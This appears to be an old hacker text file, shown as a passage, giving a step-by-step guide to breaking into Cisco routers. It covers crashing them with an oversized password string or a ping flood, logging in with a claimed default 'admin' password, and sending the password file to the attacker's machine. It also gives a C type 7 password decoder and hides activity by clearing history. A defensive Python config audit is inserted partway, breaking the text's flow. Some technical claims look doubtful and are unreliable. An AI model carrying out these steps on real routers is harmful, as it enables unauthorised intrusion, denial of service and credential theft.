exploiting cisco systems.txt
one like this, copy down its IP address.
Now you have the location of a Cisco router, but it may have a firewall protecting it, so you should check whether
it is being blocked by pinging it a couple of times; if the pings come back, it might not be blocked. Another way is
to try to reach some of the router's ports. You can do this simply with telnet, opening a connection to the router
on port 23. If it asks for a password but no username, you are at the router; if it wants a username as well, you
are probably at a firewall.
Try to find a router without a firewall, since this tutorial is about the routers and not about getting past
firewalls. Once you are sure you have found a good system, find a proxy server that allows port 23, so that your IP
will not be logged by the router.
---------------------------------
Section 3: how to break into a cisco router
Cisco routers running v4.1 software (which currently is most of them) are easily disabled. You simply connect to
the router on port 23 through your proxy server and enter a HUGE password string, something like:
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
Now wait. The Cisco system might reboot, in which case you can't hack it because it is offline, but it will
probably freeze up for a period of 2-10 minutes, which you must use to get in.
If neither happens, then it is not running the vulnerable software, in which case you can try several DoS attacks,
like a huge ping. Go to DOS and type "ping -l 56550 cisco.router.ip -t"; this will do the same trick for you.
While it is frozen, open another connection to it from some other proxy and give the password "admin". The reason
for this is that by default this is the router's password, and while it is temporarily disabled it will revert to
its default state.
Now that you have logged in, you must acquire the password file! The systems run different software, but most will
have a prompt like "htl-textil" or something. Now type "?" for a list of commands; you will see a huge list, and
somewhere in there you will find a transfer command. Use that to get the password file of admin (which is the
current user) and send it to your own IP address on port 23. But before you do this, set up HyperTerminal to wait
for a call from the Cisco router. Once you send the file, HyperTerminal will ask whether you want to accept the
file that this machine is sending you; say yes and save it to disk. Log out.
You are now past the hardest part, give yourself a pat on the back and get ready to break that password!
------------------------------
Section 4: breaking the password
Now that you have acquired the password file, you have to break it so you can access the router again. To do this,
you can run a program like John the Ripper on the password file, and you may break it.
This is the easiest way, and the way I would recommend. Another way would be to try to decrypt it. For this you
will need some decryption software, a lot of patience, and some of the decryption sequences.
Here is a sequence for decrypting a Cisco password; you have to compile this in Linux:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Key stream for Cisco "type 7" passwords, as given in this listing (22 bytes).
 * Each password byte is XORed with one key byte, starting at offset "seed". */
static const unsigned char xlat[] = {
    0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
    0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
    0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

/* Config lines that carry a type 7 value (IOS keyword is "enable password"). */
static const char pw_str1[] = "password 7 ";
static const char pw_str2[] = "enable password 7 ";
static const char *pname;

#define PW_MAX 64   /* longest decoded password we store (plus the NUL) */

/* Decode a type 7 string: two decimal seed digits followed by hex byte pairs.
 * Returns 0 on success and -1 on malformed input. */
static int cdecrypt(const char *enc_pw, char *dec_pw)
{
    size_t n = strlen(enc_pw), i;
    unsigned int seed, val;

    /* need the seed plus at least one byte, an even length, and room in dec_pw */
    if (n < 4 || (n & 1) || n / 2 > PW_MAX)
        return -1;
    if (!isdigit((unsigned char)enc_pw[0]) || !isdigit((unsigned char)enc_pw[1]))
        return -1;
    seed = (enc_pw[0] - '0') * 10 + (enc_pw[1] - '0');
    if (seed > 15)
        return -1;

    for (i = 2; i < n; i += 2) {
        int hi = toupper((unsigned char)enc_pw[i]);
        int lo = toupper((unsigned char)enc_pw[i + 1]);
        if (!isxdigit(hi) || !isxdigit(lo))
            return -1;
        if (seed >= sizeof xlat)          /* password runs past the key table */
            return -1;
        val = (isdigit(hi) ? hi - '0' : hi - 'A' + 10) * 16
            + (isdigit(lo) ? lo - '0' : lo - 'A' + 10);
        dec_pw[i / 2 - 1] = (char)(val ^ xlat[seed++]);
    }
    dec_pw[n / 2 - 1] = '\0';            /* NUL-terminate right after the last byte */
    return 0;
}

static int usage(void)
{
    fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
    fprintf(stdout, "       %s <router config file> <output file>\n", pname);
    return 0;
}

int main(int argc, char **argv)
{
    FILE *in = stdin, *out = stdout;
    char line[257];
    char passwd[PW_MAX + 1];
    size_t i, pw_pos;
    int c;

    pname = argv[0];
    if (argc > 1) {
        if (argc > 3) {
            usage();
            exit(1);
        }
        if (argv[1][0] == '-') {
            switch (argv[1][1]) {
            case 'h':
                usage();
                break;
            case 'p':
                if (argc < 3 || cdecrypt(argv[2], passwd)) {
                    fprintf(stderr, "Error.\n");
                    exit(1);
                }
                fprintf(stdout, "password: %s\n", passwd);
                break;
            default:
                fprintf(stderr, "%s: unknown option.\n", pname);
            }
            return 0;
        }
        if ((in = fopen(argv[1], "r")) == NULL)
            exit(1);
        if (argc > 2)
            if ((out = fopen(argv[2], "w")) == NULL)
                exit(1);
    }

    /* Copy the config line by line, decoding "password 7" lines on the way. */
    while (1) {
        for (i = 0; i < sizeof line - 1; ) {
            c = fgetc(in);              /* int, so EOF compares correctly */
            if (c == EOF) {
                if (i)
                    break;              /* last line had no trailing newline */
                fclose(in);
                fclose(out);
                return 0;
            }
            if (c == '\n')
                break;
            if (c == '\r')              /* drop DOS carriage returns */
                continue;
            line[i++] = (char)c;
        }
        line[i] = '\0';
        pw_pos = 0;
        if (!strncmp(line, pw_str1, strlen(pw_str1)))
            pw_pos = strlen(pw_str1);
        if (!strncmp(line, pw_str2, strlen(pw_str2)))
            pw_pos = strlen(pw_str2);
        if (!pw_pos) {
            fprintf(out, "%s\n", line); /* pass other lines through unchanged */
            continue;
        }
        if (cdecrypt(&line[pw_pos], passwd)) {
            fprintf(stderr, "Error.\n");
            exit(1);
        }
        fprintf(out, "%s%s\n", pw_pos == strlen(pw_str1) ? pw_str1 : pw_str2, passwd);
    }
}
If you do not have Linux, then the only way to break the password is to run a dictionary or brute-force attack on
the file with John the Ripper or another password cracker.
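The decoder above exists because "password 7" is a reversible obfuscation rather than a hash. As an added defensive counterpart (this script is not from the original post), here is a small audit that scans an IOS configuration for credentials stored as type 0/7 (recoverable) or type 5 (MD5) and reports the lines that should be moved to "secret" type 8/9. The configuration text and its type 7 values are constructed for illustration.

```python
import re

# Constructed sample IOS configuration for the demo; the type 7 values are made up.
SAMPLE_CONFIG = """\
service password-encryption
enable password 7 094F471A1A0A
username admin privilege 15 password 7 13061E010803
username ops secret 9 $9$placeholder.hash.for.illustration
line vty 0 4
 password 7 0205015E1F0A
 login
"""

# Storage types IOS writes after "password"/"secret": 0 = plaintext, 7 = XOR with a
# fixed key (the scheme the listing above decodes), 5 = MD5-crypt, 8 = PBKDF2-SHA256,
# 9 = scrypt. Only types 8 and 9 are adequate for credentials kept in a config file.
REVERSIBLE = {"0", "7"}
WEAK_HASH = {"5"}

# "password 7 xxxx" or "secret 9 $9$..."; a missing type number means plaintext (type 0).
CRED_RE = re.compile(r"\b(?P<kw>password|secret)\s+(?:(?P<type>\d)\s+)?(?P<value>\S+)")


def audit_config(text):
    """Return (line_no, severity, message) tuples for weakly stored credentials."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = CRED_RE.search(line)
        if not m:
            continue
        typ = m.group("type") or "0"
        if typ in REVERSIBLE:
            findings.append((no, "HIGH",
                             f"type {typ} credential is recoverable from the config; "
                             f"store it with 'secret' type 8/9 instead: {line.strip()}"))
        elif typ in WEAK_HASH:
            findings.append((no, "MEDIUM",
                             f"type 5 (MD5-crypt) is weak against offline guessing; "
                             f"migrate to type 8/9: {line.strip()}"))
    if "service password-encryption" in text and any(f[1] == "HIGH" for f in findings):
        findings.append((0, "INFO",
                         "service password-encryption only yields type 7; it is not a hash"))
    return findings


if __name__ == "__main__":
    for line_no, sev, msg in audit_config(SAMPLE_CONFIG):
        print(f"{sev:6} line {line_no}: {msg}")
```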
-------------------------------
Section 5: using the router
To use this wonderful piece of technology, you will have to be able to connect to it; use a proxy if you do not
want your IP logged. Once you have logged in, you'll want to disable the history so no one can look at what you
were doing: type "terminal history size 0". Now it won't remember anything! Type "?" for a list of all of the
router's commands, and you will be able to use most of them.
These routers usually have telnet, so you can use telnet to connect to other systems (like Unix boxes) and hack
into them. They also come with ping and traceroute, which you can use to trace systems or do DoS attacks. You may
also be able to use one to intercept packets, but I do not recommend this, as it will not always work and may get
you noticed....
---------------------------------
If you don't hack a Cisco your first time, don't worry... you probably won't do it the first time, or even the
second. It takes practice and patience. This is just to show you how... And make sure you are going after something
that is LEGAL.
--
Get your free email from http://www.hackermail.com
Powered by OutBlaze